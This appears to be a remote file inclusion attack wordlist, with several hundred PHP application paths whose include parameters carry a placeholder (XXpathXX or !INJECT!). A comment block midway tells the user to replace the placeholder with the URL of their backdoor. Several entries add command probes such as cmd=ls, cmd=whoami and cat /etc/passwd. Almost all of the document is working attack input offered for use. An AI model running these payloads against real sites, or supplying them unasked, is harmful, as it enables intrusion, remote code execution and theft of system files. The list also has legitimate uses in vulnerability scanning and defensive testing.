/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
/styles.php?toroot=XXpathXX
/styles/default/global_header.php?installed=23&domain=XXpathXX
/submit_abuse.php?path_prefix=XXpathXX
/submit_comment.php?path_prefix=XXpathXX
/subscp.php?phpbb_root_path=XXpathXX?
/suite/index.php?pg=XXpathXX?
/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
/supasite/admin_mods.php?supa[db_path]=XXpathXX
/supasite/admin_news.php?supa[db_path]=XXpathXX
/supasite/admin_settings.php?supa[include_path]=XXpathXX
/supasite/admin_topics.php?supa[db_path]=XXpathXX
/supasite/admin_users.php?supa[db_path]=XXpathXX
/supasite/admin_utilities.php?supa[db_path]=XXpathXX
/supasite/backend_site.php?supa[include_path]=XXpathXX
/supasite/common_functions.php?supa[db_path]=XXpathXX
/supasite/site_comment.php?supa[db_path]=XXpathXX
/supasite/site_news.php?supa[db_path]=XXpathXX
/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
/support/index.php?main=XXpathXX
/surveys/survey.inc.php?path=XXpathXX
/sw/lib_comment/comment.php?doc_directory=XXpathXX?
/sw/lib_find/find.php?doc_directory=XXpathXX?
/sw/lib_session/session.php?doc_directory=XXpathXX?
/sw/lib_up_file/file.php?doc_directory=XXpathXX?
/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
/sw/lib_user/find_user.php?doc_directory=XXpathXX?
/sw/lib_user/user.php?doc_directory=XXpathXX?
/sys/code/box.inc.php?config["sipssys"]=XXpathXX
/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
/system/admin/include/item_main.php?GLOBALS=XXpathXX
/system/admin/include/upload_form.php?GLOBALS=XXpathXX
/system/command/admin.cmd.php?GLOBALS=XXpathXX
/system/command/download.cmd.php?GLOBALS=XXpathXX
/system/funcs/xkurl.php?PEARPATH=XXpathXX
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
/system/login.php?site_path=XXpathXX
/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
/tags.php?BBCodeFile=XXpathXX
/taxonservice.php?dir=XXpathXX?
/teatro/pub/pub08_comments.php?basePath=XXpathXX
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
/template.php?actionsPage=XXpathXX?
/template.php?blog_theme=XXpathXX
/template.php?pagina=XXpathXX
/template/Noir/index.php?site_path=XXpathXX
/template/Vert/index.php?pageAll=XXpathXX
/template/Vert/index.php?site_path=XXpathXX
/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=XXpathXX
/template/purpletech/base_include.php?page=XXpathXX?
/template/rwb/user_bottom.php?config[template_path]=XXpathXX
/template_csv.php?rInfo[content]=XXpathXX
/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
/templates/Official/part_userprofile.php?template_path=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX?
/templates/barry/template.tpl.php?renderer=XXpathXX
/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
/templates/datumVonDatumBis.inc.php?root=XXpathXX
/templates/default/header.inc.php?menu=XXpathXX
/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
/templates/default/tpl_message.php?right_file=XXpathXX
/templates/footer.inc.php?root=XXpathXX
/templates/header.inc.php?root=XXpathXX
/templates/mylook/template.tpl.php?renderer=XXpathXX
/templates/oerdec/template.tpl.php?renderer=XXpathXX
/templates/pb/language/lang_nl.php?temppath=XXpathXX
/templates/penguin/template.tpl.php?renderer=XXpathXX
/templates/sidebar/template.tpl.php?renderer=XXpathXX
/templates/slashdot/template.tpl.php?renderer=XXpathXX
/templates/stylesheets.php?root=XXpathXX
/templates/text-only/template.tpl.php?renderer=XXpathXX
/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
/theme/breadcrumb.php?rootBase=XXpathXX?
/theme/default.php?root=XXpathXX
/theme/format.php?_page_content=XXpathXX?
/theme/format.php?_page_css=XXpathXX?
/theme/frames1.php?root=XXpathXX
/theme/frames1_center.php?root=XXpathXX
/theme/frames1_left.php?root=XXpathXX
/theme/frames1_top.php?root=XXpathXX
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
/theme/settings.php?pfad_z=XXpathXX
/theme/test1.php?root=XXpathXX
/theme/test2.php?root=XXpathXX
/theme/test3.php?root=XXpathXX
/theme/test4.php?root=XXpathXX
/theme/test5.php?root=XXpathXX
/theme/test6.php?root=XXpathXX
/themes.php?GLOBALS[theme_path]=XXpathXX?
/themes/blackorange.php?root=XXpathXX
/themes/container.php?theme_directory=XXpathXX%00
/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=XXpathXX
/themes/header.php?theme_directory=XXpathXX%00
/themes/ubb/login.php?theme=XXpathXX
/themes/ubb/login.php?theme=XXpathXX?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
/timedifference.php?la=XXpathXX
/toolbar.loudmouth.php?mainframe=XXpathXX
/tools/update_translations.php?_SESSION[path]=XXpathXX?
/top.php?laypath=XXpathXX
/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
/topsites/index.php?page=XXpathXX?&
/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
/track.php?path=XXpathXX
/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
/twebs/modules/misc/usermods.php?ROOT=XXpathXX
/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
/unavailable.php?bibtexrootrel=XXpathXX?
/unsubs.php?scdir=XXpathXX
/up.php?my[root]=XXpathXX
/upload.php?save_path=XXpathXX?
/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
/upload/top.php?maindir=XXpathXX?
/upload/xax/admin/modules/install_module.php?level=XXpathXX?
/upload/xax/admin/patch/index.php?level=XXpathXX?
/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
/upload_local.php?target=XXpathXX?
/upload_multi.php?target=XXpathXX?
/urlinn_includes/config.php?dir_ws=XXpathXX?
/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
/user_new_2.php?home=XXpathXX
/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
/vb/includes/functions.php?classfile=XXpathXX
/vb/includes/functions_cron.php?nextitem=XXpathXX
/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
/view.php?ariadne=XXpathXX?
/view.php?id=XXpathXX
/view_func.php?i=XXpathXX&l=testfile.txt?
/views/print/printbar.php?views_path=XXpathXX
/visible_count_inc.php?statitpath=XXpathXX
/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
/volume.php?config[public_dir]=XXpathXX?
/vote.php?Madoa=XXpathXX?
/votebox.php?VoteBoxPath=XXpathXX
/vp/configure.php?phpbb_root_path=XXpathXX?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
/war.php?vwar_root=XXpathXX
/warn.php?file=XXpathXX
/watermark.php?GALLERY_BASEDIR=XXpathXX
/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/web/Flickrclient.php?path_prefix=XXpathXX
/web/help.php?LIBSDIR=XXpathXX
/web/includes/blogger.php?path_prefix=XXpathXX
/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/web/includes/functions/html_generate.php?path_prefix=XXpathXX
/web/includes/functions/validations.php?path_prefix=XXpathXX
/web/index.php?LIBSDIR=XXpathXX
/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
/web/login.php?LIBSDIR=XXpathXX
/web/logout.php?LIBSDIR=XXpathXX
/web/lom.php?ETCDIR=XXpathXX
/web/network_module_selector.php?path_prefix=XXpathXX
/web/submit_abuse.php?path_prefix=XXpathXX
/web/submit_comment.php?path_prefix=XXpathXX
/webavis/class/class.php?root=XXpathXX?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/webnews/template.php?content_page=XXpathXX?
/webroot/css.php?CONFIGS=XXpathXX
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
/window.php?action=XXpathXX
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
/work/index.php?g_include=XXpathXX
/work/module/forum/forum.php?g_include=XXpathXX
/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
/wp-cache-phase1.php?plugin=XXpathXX
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
/wsk/wsk.php?wsk=XXpathXX
/xarg_corner.php?xarg=XXpathXX?
/xarg_corner_bottom.php?xarg=XXpathXX?
/xarg_corner_top.php?xarg=XXpathXX?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=XXpathXX
/yabbse/Sources/Packages.php?sourcedir=XXpathXX
/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
/zipndownload.php?PP_PATH=XXpathXX?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
# Compiled by @RSnake (2010-01-02).
# Mostly from milw0rm, osvdb.org and elsewhere.
# Change !INJECT! to the path of your backdoor.
# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
# E.g.: !INJECT! => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
/123flashchat.php?e107path=!INJECT!
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!?
/=!INJECT!
/?_CONFIG[files][functions_page]=!INJECT!
/?npage=-1&content_dir=!INJECT!%00&cmd=ls
/?npage=1&content_dir=!INJECT!%00&cmd=ls
/?show=!INJECT!?
/A-Blog/navigation/donation.php?navigation_start=!INJECT!
/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
/A-Blog/navigation/links.php?navigation_start=!INJECT!?
/A-Blog/navigation/search.php?navigation_end=!INJECT!?
/A-Blog/sources/myaccount.php?open_box=!INJECT!?
/ACGVnews/header.php?PathNews=!INJECT!
/ATutor/documentation/common/frame_toc.php?section=!INJECT!
/ATutor/documentation/common/search.php?section=!INJECT!
/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/Administration/Includes/configureText.php?path_prefix=!INJECT!
/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/Administration/Includes/userHome.php?path_prefix=!INJECT!
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
/BE_config.php?_PSL[classdir]=!INJECT!
/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
/Base/Application.php?pear_dir=!INJECT!
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
/CheckUpload.php?Language=!INJECT!&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
/DynaTracker_v151/action.php?base_path=!INJECT!
/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
/FirstPost/block.php?Include=!INJECT!
/Flickrclient.php?path_prefix=!INJECT!
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
/Full_Release/include/body_comm.inc.php?content=!INJECT!
/Gallery/displayCategory.php?basepath=!INJECT!
/Include/lib.inc.php3?Include=!INJECT!?
/Include/variables.php3?Include=!INJECT!?
/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
/ListRecords.php?lib_dir=!INJECT!?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
